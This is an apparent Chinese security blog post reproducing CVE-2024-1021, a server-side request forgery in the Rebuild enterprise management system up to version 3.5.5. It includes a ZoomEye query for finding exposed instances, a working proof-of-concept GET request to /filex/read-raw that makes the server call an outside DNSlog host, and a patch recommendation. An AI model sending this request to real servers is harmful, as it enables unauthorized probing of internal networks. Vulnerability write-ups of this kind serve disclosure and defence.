Rebuild服务器端请求伪造漏洞(CVE-2024-1021)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!
0x01漏洞介绍
Rebuild是一个高度可定制化的企业管理系统。
Rebuild 3.5.5 版本存在安全漏洞,该漏洞源于组件 HTTP Request Handler 的 readRawText 函数的 url 参数存在服务器端请求伪造漏洞。
0x02影响版本
Ruifang-Tech Rebuild <= 3.5.5
0x03漏洞复现
zoomeye语法
app:"Rebuild"
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /filex/read-raw?url=http://tejddylrxy.dgrh3.cn&cut=1 HTTP/1.1
Host: 127.0.0.1
测试DNSlog(漏洞存在)
3.nuclei工具测试(漏洞存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/getrebuild/rebuild
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果